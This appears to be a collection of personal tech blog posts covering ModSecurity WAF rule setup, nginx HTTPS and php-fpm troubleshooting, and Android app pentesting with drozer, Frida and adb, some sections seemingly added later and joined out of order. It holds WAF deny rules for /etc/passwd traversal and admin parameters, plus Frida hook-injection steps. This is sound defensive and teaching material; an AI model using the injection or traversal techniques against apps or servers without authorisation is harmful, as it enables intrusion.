  • In fact, Android itself runs and maintains an event-dispatch mechanism, while an application consists of application-triggered events plus back-end logic

    • 1. Application-triggered events: for example, a button in an app maps to a URL; tapping it opens the default browser on that URL. This is an application-triggered event;

    • 2. Back-end logic: the processing logic we do not see;
      In the example above, what the user sees after tapping is: button tap -> default browser opens -> address bar filled with the button's URL -> page loads. For the back end it may be far less simple; once we learn to read the logs, we find that the back-end code does a great deal more work.


ModSecurity: a love-hate relationship with the WAF

Dec 25, 2019. | By: Bin4xin

Contents

Added 2021/02/05

"Dawn Blossoms Plucked at Dusk"

This so-called "technical" post about the WAF does not really have much technical content. I had only just come across WAFs at the time, found them very novel and so wrote this post; back then I did not even know Linux basics very well, and a youthful attempt at configuring a WAF was bound to fail. Looking back, the writing is immature: the whole post is "transcribed" code blocks with none of my own thinking, which makes it a rather poor post.

While writing year-end summary posts I reached the WAF section, so it is a good time to complete this article. The revised article can be read below; compared with the original it mainly adds the configuration of a custom rule set and its verification, which can be reached directly via the contents links above:

It is also a chance to wrap this article up; some of my posts were half-written and then abandoned, which is not a good habit.


Notes from a WAF configuration session. With a spare moment and an idle server, I tried configuring one by hand.

1. Environment

  • nginx-1.14.0 (installed automatically via apt)
  • After hands-on verification, I recommend nginx 1.13.8; source tarball: wget http://nginx.org/download/nginx-1.13.8.tar.gz

  • ubuntu 18.04

2. Installation and configuration

The installation goes roughly like this:

  • 1. Build and install ModSecurity
    • git clone https://github.com/SpiderLabs/ModSecurity

    • nginx version: the 1.9 release recommended in the tutorial could not be built and installed on Ubuntu 18 in practice; nginx/1.13.8 or higher is recommended here, and nginx/1.18.0 strongly recommended
      • wget http://nginx.org/download/nginx-1.13.8.tar.gz
    • Install the required libraries:
      • sudo apt-get install openssl libssl-dev libpcre3 libpcre3-dev zlib1g-dev autoconf automake libtool gcc g++ make
  • 2. Build and install nginx
    • Note: add the ModSecurity nginx connector when configuring the build:
      •   git clone https://github.com/SpiderLabs/ModSecurity-nginx.git modsecurity-nginx
          ./configure --add-module=/path/to/modsecurity-nginx

    • nginx server block:
      •   server {
              listen 8077;
              location / {
                  default_type text/plain;
                  return 200 "Thank you for requesting ${request_uri}\n";
              }
          }

    • Screenshot:
      • NGINX-WAF-TEST-PAGES
  • 3. Write and test a custom protection rule:
    • Download the ModSecurity configuration file; my nginx directory is /usr/local/nginx, so my commands are:
      • cd /usr/local/nginx && mkdir modsec && cd modsec
        wget https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
        mv modsecurity.conf-recommended modsecurity.conf
        vim modsecurity.conf
        change SecRuleEngine DetectionOnly to SecRuleEngine On

        Likewise add the rule file
        vim main.conf
        with the contents
        Include /usr/local/nginx/modsec/modsecurity.conf
        SecRule ARGS:url "@contains admin" "id:2234,deny,log,status:403"
        # block and log any request whose url parameter contains the string admin

    • Error:
      •   Fix for [emerg] "modsecurity_rules_file" directive Rules error.
          vim /etc/nginx/modsec/modsecurity.conf
          comment out the following directive
          #SecUnicodeMapFile unicode.mapping 20127
    • Working server block:
      •   server {
              listen       8077;
              server_name  localhost;
              modsecurity on;
              modsecurity_rules_file /usr/local/nginx/modsec/main.conf;
              #charset koi8-r;

              #access_log  logs/host.access.log  main;

              location / {
                  root   html;
                  default_type text/plain;
                  return 200 "Thank you for requesting ${request_uri}\n";
                  #index  index.html index.htm;
                  proxy_set_header Host $host;
              }

              error_page  404 403 405              /403.html;
              location = /403.html {
                  root /usr/local/nginx/html/403;
              }
          }

    • WAF blocking screenshot:
      • WAF-DENY-TEST

If the test does not succeed, see the following links:

"Step-by-step guide to building an enterprise web firewall with ModSecurity 3.0 + Nginx"

"ModSecurity: an excellent open-source WAF"

Added 2021/02/05

3. Rule set configuration

From the above we have:

  • The custom rule set in the main.conf configuration file:
    • Test:
      •   Include /usr/local/nginx/modsec/modsecurity.conf
          SecRule ARGS:url "@contains admin" "id:2234,deny,log,status:403"
          # block and log any request whose url parameter contains the string admin

    • Of course this can be extended, for example to block /etc/passwd being passed as a parameter; this is just a starting point

When we need to write our own rule set for web defence during secure development, the following can be used as a reference:

Custom rule set: variable reference

  • REQUEST_LINE: the whole request line
    SecRule REQUEST_LINE "!(^((?:(?:POS|GE)T|HEAD))|HTTP/(0\.9|1\.0|1\.1)$)" "phase:1,id:49,log,block,t:none"
    # Only allows the POST, GET and HEAD methods, and only the HTTP/0.9, 1.0 and 1.1 protocol versions
  • REQUEST_METHOD: the request method
    SecRule REQUEST_METHOD "^(?:PUT|CONNECT|TRACE|DELETE)$" "phase:1,id:49,log,block,t:none"
    # Blocks the request if the method is any of PUT, CONNECT, TRACE or DELETE
  • REQUEST_PROTOCOL: the request protocol and version
    SecRule REQUEST_PROTOCOL "!^HTTP/(0\.9|1\.0|1\.1)$" "phase:1,id:50,log,block,t:none"
    # Blocks the request if the protocol is not HTTP/0.9, 1.0 or 1.1
  • REQUEST_URI: the full request URL including the query string
    SecRule REQUEST_URI "attack" "phase:1,id:52,log,block,t:none,t:urlDecode,t:lowercase,t:normalizePath"
    # Blocks the request if the request URL contains the string attack (checked after URL-decoding, lower-casing and path normalisation)
  • REQUEST_FILENAME: the relative request URL without the query string
    SecRule REQUEST_FILENAME "/etc/passwd" "phase:1,id:53,log,block,t:none"
    # Blocks the request if the request URL (without parameters) contains /etc/passwd
  • REQUEST_HEADERS: the collection of all request headers; a specific header can be checked with the REQUEST_HEADERS:Header-Name syntax
    SecRule REQUEST_HEADERS:Host "^[\d\.]+$" "deny,id:47,log,status:403"
    # If the Host header is an IP address, the deny action rejects the request and returns 403 to the client

Screenshot: WAF-PASSWD-DENY
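To make the semantics of the variables and transformations above concrete, here is an added example, not the page's own code and not ModSecurity itself: a small Python model of the phase-1 rules in the table (plus the main.conf rule from section 2), run over constructed raw requests. The REQUEST_LINE rule is coded by its stated intent (method must be GET/POST/HEAD and protocol HTTP/0.9 to 1.1) rather than by the table's literal regex, and the rule ids are the table's own.

```python
# Added example, not the page's own code: a Python model of the phase-1 rules
# above (and the main.conf rule from section 2), run over constructed raw
# requests. The REQUEST_LINE rule is coded by its stated intent rather than the
# table's literal regex.
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit


def parse_request(raw):
    """Split a raw request into the ModSecurity variables used below."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    uri = parts[1] if len(parts) > 1 else "/"
    protocol = parts[2] if len(parts) > 2 else "HTTP/0.9"
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    split = urlsplit(uri)
    return {
        "REQUEST_LINE": lines[0],
        "REQUEST_METHOD": method,
        "REQUEST_PROTOCOL": protocol,
        "REQUEST_URI": uri,              # path plus query string
        "REQUEST_FILENAME": split.path,  # path only
        "REQUEST_HEADERS": headers,      # keys lower-cased
        "ARGS": {k: v[0] for k, v in parse_qs(split.query).items()},
    }


# The t: transformations referenced by the rules, applied in order.
TRANSFORMS = {
    "none": lambda s: s,
    "urlDecode": unquote,
    "lowercase": str.lower,
    "normalizePath": lambda s: posixpath.normpath(s) if s else s,
}


def rx(pattern, negate=False):
    """@rx operator; negate=True models the leading '!' in the table."""
    comp = re.compile(pattern)
    return lambda s: bool(comp.search(s)) != negate


def contains(needle):
    """@contains operator (a bare string in the rule is a substring match)."""
    return lambda s: needle in s


# (id, variable, operator, transformations). Ids are the table's; note that
# ModSecurity itself refuses to load two rules with the same id, so the two
# id:49 rules could not coexist in one main.conf without renumbering one.
RULES = [
    (49, "REQUEST_LINE", rx(r"^(?:POST|GET|HEAD) \S+ HTTP/(?:0\.9|1\.0|1\.1)$", negate=True), ["none"]),
    (49, "REQUEST_METHOD", rx(r"^(?:PUT|CONNECT|TRACE|DELETE)$"), ["none"]),
    (50, "REQUEST_PROTOCOL", rx(r"^HTTP/(?:0\.9|1\.0|1\.1)$", negate=True), ["none"]),
    (52, "REQUEST_URI", contains("attack"), ["none", "urlDecode", "lowercase", "normalizePath"]),
    (53, "REQUEST_FILENAME", contains("/etc/passwd"), ["none"]),
    (47, "REQUEST_HEADERS:Host", rx(r"^[\d\.]+$"), ["none"]),
    (2234, "ARGS:url", contains("admin"), ["none"]),
]


def get_var(req, spec):
    """Resolve VARIABLE or VARIABLE:key (e.g. REQUEST_HEADERS:Host)."""
    name, _, key = spec.partition(":")
    value = req[name]
    if not key:
        return value
    return value.get(key.lower() if name == "REQUEST_HEADERS" else key)


def transform(value, names):
    for n in names:
        value = TRANSFORMS[n](value)
    return value


def inspect_request(raw, rules=RULES):
    """Return the id of the first rule that fires (request gets 403), else None."""
    req = parse_request(raw)
    for rule_id, var, test, tr in rules:
        value = get_var(req, var)
        if value is not None and test(transform(value, tr)):
            return rule_id
    return None


# Constructed sample requests (CRLF line endings, as on the wire).
OK_REQ = "GET /?page=index HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
ENCODED_ATTACK = "GET /?page=%41TT%41ck HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
PASSWD = "GET /../../etc/passwd HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
IP_HOST = "GET / HTTP/1.1\r\nHost: 192.168.3.59\r\n\r\n"
ADMIN_ARG = "GET /?url=/admin/login HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
TRACE_REQ = "TRACE / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

# The same rules with every transformation stripped: shows why rule 52 needs
# t:urlDecode and t:lowercase to catch the percent-encoded, mixed-case form.
RULES_NO_TRANSFORM = [(i, v, t, ["none"]) for i, v, t, _ in RULES]
```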

References:

ModSecurity Chinese manual

4. Summary

The original version spent a lot of space on configuration code; most of it was removed in the later revision, and those interested can look at the second link above;

Here I actually took a detour by following the original tutorial: its author used a reverse proxy, whereas the working server block above shows that it is enough to attach the WAF directly for the rule set to take effect.


That is all.


1. drozer overview

It runs much like the Frida hook framework: both use a client/server model.

  • 1) Mobile side: drozer-agent. Before starting the drozer framework on the PC, open drozer-agent and set up port forwarding
  • 2) PC side: mainly the CLI, where all the pentest commands are entered and executed;

1.1 drozer environment

  • windows/linux-debian
  • python2.7
  • drozer & drozer-agent

1.2 Preparation

windows-drozer-2.4.4.msi download
debian-linux-drozer-2.4.4.deb download
android-drozer-2.3.4.apk download

One more note:
An msi is a Windows installer; just double-click it.
deb: dpkg -i <deb package>
The apk is the Android package; download it locally and run <adb install apk package>

2. drozer in practice

C:\Users\本阿信>drozer console connect
Selecting 7ad839637216ad27 (OPPO OPPO R11 Plus 5.1.1)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.4.4)
dz>

updating~


  • In a spare moment: this post records the Frida hook framework and how to use Frida to inject code and hook an Android apk.

Preparing the Frida framework

1. Installing the Frida framework
Frida uses a client/server model:

  • 1) One part is the command-line tool that runs on the client: the Frida CLI.
  • 2) The other part is the code injector that runs on the target machine (the server, an Android phone in this post): frida-server.
    The flow: you control Frida from the computer; once the server side on the target machine is started, custom operations such as specifying a hook script are sent as parameters from the client to the server, which receives them and acts on them

2. A test apk

3. The hook code (not convenient to publish here, apologies)

Installing Frida

Frida supports both Python 3 and Python 2.7; since there are real differences between them, this post installs Frida under Python 2.7:
Check the pip version

pip --version
pip 18.1 from /usr/lib/python2.7/dist-packages/pip (python 2.7)
## use the pip of whichever environment you want to run Frida in (pip or pip3)
pip3 --version
pip 18.1 from /usr/lib/python3/dist-packages/pip (python 3.7)

Just confirm the installation happens in the 2.7 environment:

pip install frida
Collecting frida
    Downloading https://files.pythonhosted.org/packages/38/1b/8a462787cedda36c57227ed0babbd80c4c4cc5bc9c1f9b5aa285ed6aebba/frida-12.8.0.tar.gz
Building wheels for collected packages: frida
  Running setup.py bdist_wheel for frida ... \
  Successfully built frida
Installing collected packages: frida
Successfully installed frida-12.8.0

After installing frida, install the dependency frida-tools:

pip install frida-tools
	100% |████████████████████████████████| 348k

At this point the basic Frida framework is installed; check the frida version

frida --version
12.8.0

Installing frida-server

This installs Frida's server side, which runs on the phone. Most phones are ARM, but some of you use emulators, so first check the phone's CPU architecture:

adb shell
* daemon not running; starting now at tcp:5037
* daemon started successfully
shell@angler:/ $ su
root@angler:/ # getprop ro.product.cpu.abi
arm64-v8a

If the output says arm, download the arm build; if it says x86, download the x86 build. frida-server download
Be careful to download the right one: on the release page, press CTRL+F and search for server. After downloading, rename it to frida-server
Push frida-server to the phone (note: the PC-side frida version must match the mobile side):

## PC side
adb devices
adb push frida-server /data/local/tmp
adb forward tcp:27042 tcp:27042
adb forward tcp:27043 tcp:27043
## mobile side
adb shell
root@angler:/data/local/tmp # cd /data/local/tmp/ 
root@angler:/data/local/tmp #./frida-server

Frida hook in practice

With frida-server started on the server side, operate from the client:

## specify the package name and the path to the js file
frida -U -f <package-name> -l <hook.js-path>
## once <package-name> is reported as Spawned, enter %resume to restart the app and inject the hook


As shown in the screenshot, after the app restarts the hook framework code is detected and a prompt pops up; at this point the js code has been injected successfully.

That is all.

Reference: Frida detailed installation tutorial


Notes - nginx: upgrading from http to https

Dec 7, 2019. | By: Bin4xin

Graceful HTTPS, a fine match for TCP;

How to go from http to https with nginx? It sounds fantastic!

Actually the certificate was issued long ago, but I could never get the configuration to work (said quietly). For the record: on 2019-12-13, chihou.pro was upgraded to https. Heh heh

1. Install the libssl library

sudo apt-get install libssl-dev
apt-get install libpcre3 libpcre3-dev

2. Build with SSL support

cd nginx/
./configure --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-file-aio --with-http_realip_module
make
# If nginx is already installed, stop here.
# Otherwise also run:
make install
cd <nginx-unpack-dir>/sbin/   # the directory you unpacked nginx into
./nginx -V
nginx -V   # note the capital V; check that --with-http_ssl_module appears in the output
nginx version: nginx/1.16.1
built with OpenSSL 1.1.1d  10 Sep 2019
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2 --with-http_ssl_module
cp nginx /usr/sbin
# copying it to a directory on the PATH makes it quick to start

3.认证配置

证书申请下来后把证书传到服务器上就行了,配置nginx的https区块即可。

http {
    server {
        listen 443;
        server_name XXX;
        ssl on;   # deprecated since nginx 1.15.0; "listen 443 ssl;" is the current form
        ssl_certificate    /usr/local/nginx/conf/cert/214.pem;   # path to your own certificate
        ssl_certificate_key   /usr/local/nginx/conf/cert/21.key;
        ssl_session_timeout 5m;
        ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
        ssl_protocols TLSv1 TLSv1.1 TLSv1.2;   # TLSv1 and TLSv1.1 are legacy; current guidance is TLSv1.2 and TLSv1.3 only
        ssl_prefer_server_ciphers on;

        location / {

        }
    }
}

nginx -t 
systemctl reload nginx

AMAZING: it failed

Feeling smug, I went to verify the site, timidly (read: cockily) typed https://www.chihou.pro, and was dumbfounded: still the HTTP protocol notice. So annoying.

Quickly, before the SSH session dropped, I went looking for where the configuration had gone wrong. Reasoning: ssl is configured and port 443 is listened on, so the server must be listening on 443; check that first:

netstat -tunlp | grep 443   # no output, so look at every listening service
netstat -tunlp              # (only part shown) the server is not listening on 443
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      861/nginx: master p 
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      319/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      6029/sshd           

As shown above, nginx was configured to listen on 443, but Linux was not actually listening on it; the problem had to be there.
First candidate to rule out: the nginx configuration. The config passes the syntax test, so rule it out for now.
Second: the firewall. I first logged into the cloud console and confirmed port 443 was open; fine. Then I logged into the server to check the host firewall; since it is an Ubuntu server, that means checking the ufw status:

systemctl status ufw
● ufw.service - Uncomplicated firewall
   Loaded: loaded (/lib/systemd/system/ufw.service; enabled; vendor preset: enabled)
   Active: active (exited) since Fri 2019-12-13 10:46:00 CST; 1h 54min ago
     Docs: man:ufw(8)
  Process: 31826 ExecStop=/lib/ufw/ufw-init stop (code=exited, status=0/SUCCESS)
  Process: 31967 ExecStart=/lib/ufw/ufw-init start quiet (code=exited, status=0/SUCCESS)
 Main PID: 31967 (code=exited, status=0/SUCCESS)

Dec 13 10:46:00 iZj6cgn7odv59wmjjhe6zwZ systemd[1]: Starting Uncomplicated firewall...
Dec 13 10:46:00 iZj6cgn7odv59wmjjhe6zwZ systemd[1]: Started Uncomplicated firewall.

The server firewall showed as active, but what came next left me speechless

ufw status verbose
Status: inactive
ufw status numbered
Status: inactive

No matter how I phrased the command it said inactive; I broke down on the spot, and even tried silly commands like systemctl status verbose ufw - -||| Then I looked up all sorts of commands, because I was convinced there was a second firewall on the server~
Reason: the console had 443 open, yet my check failed: telnet $IP 443 returned telnet: Unable to connect to remote host: Connection refused, so I stayed stuck in the firewall dead end. Round and round in circles. And so it dragged on until today TAT

It can be solved.

It later turned out the problem was not the firewall at all. Surfing the web today I came across a post:

(suggest opening it in a new tab~ heart), quoting the article:

If you cannot connect, it is usually the firewall, or nginx not being started (I'm a real genius), or similar causes;
Analyze the problem calmly and read the error messages; that is the way to solve problems

Relating this to my own problem: could it be that nginx had never actually restarted? That woke me up. Quickly logged into the server. Since systemctl had no effect, use nginx's own command directly

nginx -s reload

Typed chihou.pro, hit F5
It actually redirected to the HTTPS page. I cried.
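A check that would have shortened the hunt above, added here as an example (not code from the original post): it compares the listen directives in an nginx config with the sockets that are actually bound and says whether nginx is serving a stale configuration. The config and netstat text are constructed samples modelled on the ones shown above.

```python
import re

# Constructed sample modelled on the server block above (not the author's file).
NGINX_CONF = """
http {
    server {
        listen 80;
        server_name example.invalid;
    }
    server {
        listen 443 ssl;
        listen [::]:443 ssl;
        server_name example.invalid;
    }
}
"""

# Constructed sample modelled on the netstat -tunlp output above.
NETSTAT_OUTPUT = """Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      861/nginx: master p
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      319/systemd-resolve
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      6029/sshd
udp        0      0 127.0.0.53:53           0.0.0.0:*                           319/systemd-resolve
"""

LISTEN_RE = re.compile(r"^\s*listen\s+([^;]+);", re.MULTILINE)


def configured_ports(conf):
    """TCP ports named by the listen directives of an nginx config."""
    ports = set()
    for match in LISTEN_RE.finditer(conf):
        address = match.group(1).split()[0]      # "443", "[::]:443", "*:80", "unix:/path"
        if address.startswith("unix:"):
            continue
        port = address.rsplit(":", 1)[-1]        # works for "[::]:443" and for a bare "443"
        if port.isdigit():
            ports.add(int(port))
    return ports


def listening_ports(netstat):
    """Map of bound TCP port -> set of owning process names, from netstat -tunlp."""
    bound = {}
    for line in netstat.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        port = int(fields[3].rsplit(":", 1)[-1])
        bound.setdefault(port, set()).add(" ".join(fields[6:]))
    return bound


def unbound_ports(conf, netstat):
    """Ports nginx is configured for but nothing has bound."""
    return sorted(configured_ports(conf) - set(listening_ports(netstat)))


def diagnose(conf, netstat):
    """Next troubleshooting step, following the reasoning in the post."""
    missing = unbound_ports(conf, netstat)
    if not missing:
        return "ok: every configured port is bound"
    owners = listening_ports(netstat).values()
    if any("nginx" in owner for procs in owners for owner in procs):
        # nginx is up but still running the old config: reload, don't chase the firewall
        return ("stale: nginx is running but ports %s are not bound; "
                "run `nginx -t` and then `nginx -s reload`" % missing)
    return "down: nginx is not listening at all; start it and check the error log"


if __name__ == "__main__":
    print(diagnose(NGINX_CONF, NETSTAT_OUTPUT))
```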

Analyze the problem calmly and read the error messages; that is the way to solve problems
the way to solve problems
solve problems
Aoligei~ (let's go)
go...

If this article helped you, why not shout a big "nice" in your head
Respectfully. Thank you for reading
References:
Starting Nginx gives Failed to start nginx.service: unit not found
Compiling and installing nginx on Ubuntu
Dynamically adding the ssl module to nginx


[Troubleshooting]: php-fpm returns 404 Not Found

Dec 4, 2019. | By: Bin4xin

  • php + nginx fails to process PHP, returning 404 Not Found

Preface

The container hosts my own personal blog, which uses static pages for security reasons. But maintaining the blog over the public internet is awkward, and the open-source cloud-storage project I used before needs PHP to run, so I wanted to try "nginx + php" to make maintaining the blog easier.
What this noob ultimately wanted was:

  • static html: web blog + dynamic php: store server
  • static blog pages + a dynamic PHP page for uploading markdown files

Symptom

The nginx container starts and HTML pages render fine, but PHP pages fail with 404 NOT FOUND;

vi index.php
<?php
phpinfo();
?>

Seeing that 404 header, bigger than my head, gave me a headache; every PHP-related setting had been checked and was correct.

server {
    location ~ \.php {
        index  index.php index.html;
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
    }
}

Searched all over for php-404 and asked people. No answers.

Troubleshooting

A sudden realization

I had just grabbed a Huawei cloud server and immediately installed the nginx + php storage project on it for convenient file transfer. While configuring nginx I saw this line:

##
# Virtual Host Configs
##
	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;

I slapped my thigh: when I set up the blog server, to save trouble I had commented out the /etc/nginx/sites-enabled/ include line and configured the PHP location directly in the http block. Quickly reconfigured php-fpm:

Link: [Porting] Ubuntu with ARM: notes on building a public-internet storage container http://www.chihou.pro/2019/11/10/Ubuntu-linux-with-arm/

Enlightenment

After re-creating the php-fpm symlink I eagerly visited the PHP file, and got another error:

502:Bad-Gateway

A sigh of relief: at least it is not that damned 404 anymore. A 502 is basically a php-fpm configuration problem, usually fpm failing while processing. Checked the PHP runtime log:

cat /var/log/php7.2-fpm.log
[04-Dec-2019 17:58:14] NOTICE: ready to handle connections
[04-Dec-2019 17:58:14] NOTICE: systemd monitor interval set to 10000ms

Sure enough, php-fpm had timed out while processing, causing the error; searched for the fix directly;

Solved

Add fpm process settings to the php-fpm configuration file:

vi /etc/php/7.2/fpm/php-fpm.conf
;;;;;;;;;;;;;;;;;;
; Global Options ;
;;;;;;;;;;;;;;;;;;
pm.max_children = 50
pm.start_servers = 15
pm.min_spare_servers = 10
pm.max_spare_servers = 40 
systemctl reload php-fpm

And add the following to the nginx configuration:

vi /etc/nginx/nginx.conf
http {

fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;

} 
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
Test passes

Visited index.php and finally saw the familiar phpinfo page; troubleshooting and configuration done.


Update 2020-02-20:

After configuring nginx and php-fpm on Linux, the web page would not display. The nginx access log showed 200, i.e. the request succeeded. Static HTML pages were fine, but PHP pages were always blank with no error at all. After searching, it turned out a line has to be added to nginx:

fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;

The default fastcgi_params file shipped with nginx does not contain this line.

In nginx.conf's

location ~ \.php$ {   # the dot must be escaped, otherwise the regex also matches e.g. /xphp
    root html;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    #fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
}

Or add the following to the fastcgi_params file:

# PHP only, required if PHP was built with --enable-force-cgi-redirect
fastcgi_param REDIRECT_STATUS 200;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;

Then restart nginx and the page will display.

Blank page with status 200 when running PHP files under nginx: https://blog.csdn.net/xkweiguang/article/details/52795166


502 Bad Gateway:

Automated install with apt:

Configure the /etc/php/7.3/fpm/pool.d/www.conf file:
php-fpm.conf: listen = 127.0.0.1:9000
nginx.conf: fastcgi_pass 127.0.0.1:9000;

php 502 bad gateway fix: https://blog.csdn.net/ucmir183/article/details/80240112

That's all.

= =|||


[Android Pentesting]: Overview

Nov 30, 2019. | By: Bin4xin

  • Abstract: I have been learning Android pentesting recently, so I am recording the relevant points, including some I have not yet figured out. Continuously updating~

Preface

I have been involved in some Android pentesting projects. Different security companies have internal requirements that define the basic principles and working methods for Android pentesting, and different external commercial pentests are used. The overview covers:
1. Code and program security;
2. CAPTCHA mechanism security;
3. Authorization-bypass checks;
4. Server-side web vulnerabilities.

I. Code / program security

1. Source decompilation: keep the source safe and ensure it cannot be decompiled.

Prevents malicious actors from reading the source and understanding the execution logic.

2. Code obfuscation: obfuscate and encrypt the program code

Prevents malicious actors from understanding the source.

3. Repackaging

Prevents malicious actors from tampering with the installation package.

		|_ Main onCreate handler class, dialog code:
				AlertDialog.Builder builder = new AlertDialog.Builder(MainActivity.this);
				builder.setTitle("test alert");
				builder.setMessage("test by bin4xin");
				builder.setPositiveButton("yes", null);
				builder.show();
		|_ Insert a toast prompt at key positions:
				btnToast1.setOnClickListener(new View.OnClickListener() {
				    @Override
				    public void onClick(View v) {
				        Toast toast = Toast.makeText(MainActivity.this, "Toast Message", Toast.LENGTH_SHORT);
				        toast.setGravity(Gravity.CENTER, 0, 0);
				        toast.show();
				    }
				});
		|_ Insert key debug log output at key positions:
				// signature: public static int d(String tag, String msg)
				Log.d("DEBUG", "This is a debug");
		|_ Analyze the exact location of the check in the smali/so code and whether it can be modified to bypass the protection;
		|_ Analyze bypasses using legitimate, licensed data.

4. Signature verification

Prevents malicious actors from tampering with the source and distributing a repackaged installer.

5. .so file security?

(What is the difference between an .so library and an imported library? Can an .so file be understood as a disassembled component of the package?)

6. H5 code security?

(Is the H5 code in an Android project static code used only for display?)

7. APK update mechanism

Prevents the update APK from being a repackaged APK from a malicious actor.

II. Debug security

8. debug attribute security

Prevents the release APK from being debuggable

	|_ AndroidManifest.xml -> [-] remove the debuggable attribute or set it to false;


[Android Pentesting]: ADB, the favored child

Nov 30, 2019. | By: Bin4xin

Introduction to adb

adb (Android Debug Bridge) is a versatile command-line tool that lets devices (PC and mobile) communicate with each other. adb commands make it easy to perform various device actions (such as installing and debugging apps) and provide access to a Unix shell that can run a variety of commands on the device. It is a client-server program.

I. Connecting with adb

This noob uses an emulator; different emulators use different ports. The Google emulator, for example, defaults to 5555;

$ adb connect 127.0.0.1:21503
adb server is out of date.  killing...
* daemon started successfully *
connected to 127.0.0.1:21503
$ adb devices
List of devices attached
127.0.0.1:21503 device

II. Commonly used adb commands

I won't dwell on Linux commands; straight to the commonly used adb commands (viewed and run from the PC console). Android Debug Bridge version 1.0.32 device commands:

1. adb push

As the name says, push:

From the PC console, push a file (or folder) from the PC to the device; example:
$ adb push inject /data/local
1606 KB/s (17936 bytes in 0.010s)
Verify on the Android device:
root@SM-G9350:/data/local # ls
gdb
inject
tmp

As shown above, the inject file was pushed to the Android device.

2. adb pull

The opposite of push

From the PC console, pull a file (or folder) from the device to the PC.
$ adb pull /data/local/inject C:\Users\本阿信
2507 KB/s (17936 bytes in 0.006s)
Verify in the console in the destination folder:
$ dir
 驱动器 C 中的卷是 root
 卷的序列号是 0009-A6D5
 C:\Users\本阿信 的目录 (DIR below is really in angle brackets, which would close the text formatting, so parentheses are used instead)
2019/11/30  22:25    (DIR)          .
2019/11/30  22:25    (DIR)         ..
2019/11/28  17:15    (DIR)         .android
2019/11/28  17:44    (DIR)         .idlerc
2019/11/30  22:03    (DIR)         .MemuHyperv
2019/10/16  22:05    (DIR)         .ssh
2019/11/30  22:25            17,936 inject

As shown above, the inject file has been pulled to the PC.

3. adb shell

Opens a shell on the connected Android device; adb reports that it is connected to the phone and drops you straight into the system.

$ adb shell
root@SM-G9350:/ # whoami
root
root@SM-G9350:/ # pwd
/
root@SM-G9350:/ # uname -a
Linux localhost 4.0.9 #661 SMP PREEMPT Mon Nov 4 13:15:47 CST 2019 i686 GNU/Linux

You can see the familiar shadow of a Linux system~

4. adb shell <command>

With a command appended; unlike 3, this is "run remote shell command": the command runs remotely and the console does not enter the Android shell;

$ adb shell uname -a
Linux localhost 4.0.9 #661 SMP PREEMPT Mon Nov 4 13:15:47 CST 2019 i686 GNU/Linux
As above, the console echoes the output, but you are still in the PC console and have not entered the Android console.

5. adb logcat

[] - View device log:

View all logs:
$ adb logcat
--------- beginning of main
I/Netd    (    0): Netd 1.0 starting
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/default/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/eth0/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/ifb0/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/ifb1/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/lo/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/sit0/accept_ra_rt_table: No such file or directory
I/installd(    0): installd firing up
I/        (    0): debuggerd: Apr  4 2019 17:10:30

Filter the log:

$ adb logcat E/WifiStateMachine
E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
